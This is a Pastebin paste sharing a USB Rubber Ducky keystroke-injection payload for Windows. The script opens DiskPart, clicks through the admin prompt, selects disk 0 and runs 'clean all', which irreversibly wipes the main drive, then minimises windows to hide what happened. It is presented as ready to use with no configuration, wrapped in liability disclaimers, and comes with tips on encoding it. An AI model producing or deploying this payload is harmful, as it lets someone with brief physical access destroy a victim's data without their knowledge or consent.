Advertisement
ItzEdInYourBed

Scuffed - HDD Wipe

Apr 6th, 2020
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.59 KB | None | 0 0
  1. !! KISAK.CLUB, GITHUB.COM, HAK5.ORG, HAKSHOP.COM, DUCK TOOLKIT, ANY OF ITS USERS, OWNERS, STAFF MEMBERS AND I ARE NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS. WHAT YOU DO IS YOUR RESPONSIBILITY !!
  2. The Duck Toolkit is an open source Penetration Testing tool for authorized network auditing and security analysis purposes only where permitted. Users are solely responsible for compliance with all laws of their locality. The Duck Toolkit software developers and affiliates claim no responsibility for unauthorized or unlawful use.
  3.  
  4. For those that don't know what a RubberDucky is, just click on the following link. https://hakshop.com/products/usb-rubber-ducky-deluxe
  5.  
  6. This script requires CMD and admin access. Has been tested on Windows 10 but should work on any Windows OS.
  7. This payload can be used right away and does not require any further configuration.
  8.  
  9. [CODE]
  10. REM !! KISAK.CLUB, GITHUB.COM, HAK5.ORG, HAKSHOP.COM, DUCK TOOLKIT ANY OF ITS USERS, OWNERS, STAFF MEMBERS, AND I ARE NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS, WHAT YOU DO IS YOUR RESPONSIBILITY. !!
  11. REM Visit https://kisak.club/ for more payloads.
  12. DELAY 5000
  13. REM Opens Microsoft DiskPart.
  14. GUI r
  15. DELAY 500
  16. STRING diskpart
  17. DELAY 500
  18. ENTER
  19. DELAY 500
  20. REM
  21. LEFT
  22. DELAY 500
  23. ENTER
  24. DELAY 1500
  25. REM Selects the main drive.
  26. STRING select disk 0
  27. DELAY 500
  28. ENTER
  29. DELAY 500
  30. REM Starts the wipe process.
  31. STRING clean all
  32. DELAY 500
  33. ENTER
  34. REM Minimizes all windows.
  35. WINDOWS d
  36. [/CODE]
  37.  
  38. Simply build the above code using any Encoder(If you have no idea what this is, feel free to ask in the comments)
  39.  
  40. Feel free to ask any questions you may have.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement